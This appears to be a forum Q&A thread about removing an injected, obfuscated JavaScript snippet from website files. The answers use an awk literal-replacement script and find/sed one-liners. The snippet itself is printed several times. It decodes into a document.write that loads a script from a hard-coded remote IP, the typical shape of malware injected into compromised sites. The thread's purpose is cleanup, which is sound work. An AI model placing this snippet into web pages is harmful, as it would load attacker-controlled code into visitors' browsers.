
Replacing a complex pattern using sed

I want to replace a pattern using the sed command. The pattern to be removed (replaced with a space) is shown below.

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

Now I need to replace the above pattern with a space. The pattern can appear anywhere in the file (i.e. at the beginning of the file, at the end of the file, or between other strings).

Any tips on a regex to remove it via sed?

Thanks.

$ cat r.awk
#!/usr/bin/awk -f

NR == FNR { # first file: its first line is the literal string to match
    str = $0
    rep = " " # replacement text
    RS = "$^" # regexp which never matches => the next record will be
              # the whole second file as a single string
    nextfile
}

{
    file = $0; ans = ""
    while (i = index(file, str)) {
        pre  = substr(file, 1, i - 1)         # part before `str'
        post = substr(file, i + length(str))  # part after `str'
        ans  = ans pre rep # append to the output
        file = post
    }
    ans = ans file
    printf "%s", ans
}

Store the string in a file:

$ cat r.txt
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

An example:

$ cat f.txt
BEFORE
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
AFTER
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
END

Usage:

$ awk -f r.awk r.txt f.txt

BEFORE

AFTER

END
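A side note on why the string is read from a file: awk applies backslash-escape processing to -v assignments, so a string full of \x.. sequences would not arrive intact that way. As a minimal sketch of an alternative (not the script above), the string can be passed through the environment, which awk does not escape-process. The function name replace_literal and the variable names STR and REP are made up for illustration, and this variant works line by line, so it assumes the string does not span several lines.

```shell
#!/bin/sh
# replace_literal STR REP FILE  (hypothetical helper, for illustration only)
# Prints FILE with every literal occurrence of STR replaced by REP.
# STR is compared with index(), so it is never interpreted as a regex.
replace_literal() {
    STR=$1 REP=$2 awk '
        BEGIN { str = ENVIRON["STR"]; rep = ENVIRON["REP"] }
        {
            line = $0; out = ""
            # consume the line left to right, one match at a time
            while (str != "" && (i = index(line, str))) {
                out  = out substr(line, 1, i - 1) rep
                line = substr(line, i + length(str))
            }
            print out line
        }
    ' "$3"
}
```

With the files from the example it could be called as replace_literal "$(cat r.txt)" ' ' f.txt. The result goes to standard output, so redirect it to a new file if you want to keep it.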

Another way to do what you are after (removing the pattern only), using the find and sed commands in one line:

$ find /path/to/files/ -type f \( -name "*.js" -o -name "*.json" \) -exec sh -c 'sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" "$0"' {} \;

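The above command searches under the given path and removes the pattern from any file with a .js or .json extension. To replace it with a space instead, put a space between the last two slashes of the s command. Note that .* is greedy, so if the pattern occurs twice on one line, everything between the first and the last occurrence is removed as well. Also, \s and -i without a backup suffix are GNU sed features.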
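If you would rather match the whole injected string exactly than rely on a .* in the middle, one common trick is to backslash-escape the characters that are special in a sed basic regex and then use the result as the pattern. A minimal sketch, assuming the string fits on one line. The name escape_bre is hypothetical, not a standard tool.

```shell
#!/bin/sh
# escape_bre STRING  (hypothetical helper, for illustration only)
# Prints STRING with the BRE metacharacters ] [ \ . * ^ $ and the "/"
# delimiter backslash-escaped, so it can be used as a literal sed pattern.
# Parentheses, braces, + and ? are already literal in a basic regex,
# so they must be left alone.
escape_bre() {
    printf '%s\n' "$1" | sed 's/[][\\.*^$/]/\\&/g'
}
```

It could then be used as sed "s/$(escape_bre "$(cat r.txt)")/ /g" f.txt, where r.txt holds the string as in the awk example.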

For JS only:

$ find /path/to/files/ -type f -name "*.js" -exec sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" '{}' \;

Feel free to remove the -name "*.x" part if you want to search files with any extension.
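Since sed -i rewrites files in place, it may be worth listing the affected files first. A minimal sketch of such a dry run, using grep -F so that the marker is treated as a fixed string rather than a regex. The function name list_matching_js and the marker used in the usage line are assumptions for illustration.

```shell
#!/bin/sh
# list_matching_js DIR MARKER  (hypothetical helper, for illustration only)
# Prints the path of every *.js file under DIR that contains MARKER.
# Nothing is modified: grep -l only lists file names.
list_matching_js() {
    find "$1" -type f -name '*.js' -exec grep -lF -- "$2" {} +
}
```

For example, list_matching_js /path/to/files/ 'var _0xaae8=' shows which files the sed command would touch. Running sed with -i.bak instead of -i also keeps a backup copy of each file it changes.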
